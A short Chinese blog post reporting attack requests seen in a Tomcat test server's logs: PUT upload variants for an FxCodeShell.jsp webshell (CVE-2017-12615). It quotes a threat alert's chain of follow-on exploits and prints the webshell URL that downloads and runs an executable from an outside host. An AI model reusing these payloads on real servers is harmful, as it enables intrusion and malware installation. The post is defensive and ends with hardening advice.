FxCodeShell Tomcat 漏洞攻击发现

攻击发现

在检查公网上的测试平台的日志时候先来自某个IP多个请求

FxCodeShell Tomcat 漏洞攻击发现

通过PUT的方式访问,接口

	/FxCodeShell.jsp

攻击者通过扫描的方式服务运行端口上发起,4次请求
FxCodeShell Tomcat 漏洞攻击发现
按时间顺序分别是:

GET 	/FxCodeShell.jsp

PUT /FxCodeShell.jsp::$DATA

PUT 	/FxCodeShell.jsp/

PUT 	/FxCodeShell.jsp%20

攻击手段

摘自 威胁警报:多个加密货币矿工僵尸网络开始利用新的ThinkPHP漏洞 . https://www.alibabacloud.com/blog/threat-alert-multiple-cryptocurrency-miner-botnets-start-to-exploit-the-new-thinkphp-vulnerability_594369

步骤 1: 用Tomcat PUT任意文件上传漏洞(CVE-2017-12615)
利用此漏洞上传名为FxCodeShell.jsp的webshel​​l,它可以下载和执行文件:

/FxCodeShell.jsp? wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe&wiew=FxxkMyLie1836710Aa&o

步骤2: Struts2远程代码执行漏洞(CVE-2017-5638)
步骤3: WebLogic WLS组件远程执行代码漏洞(CVE-2017-10271)
步骤4: EternalBlue漏洞(MS-17-010)
步骤5: ipc $暴力攻击(首先使用弱密码启动暴力攻击,然后使用Mimikatz提升权限)

请各位关闭无用的端口,限制WEB服务器上的路径匹配规则,防止攻击。

相关文章:

猜你喜欢
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode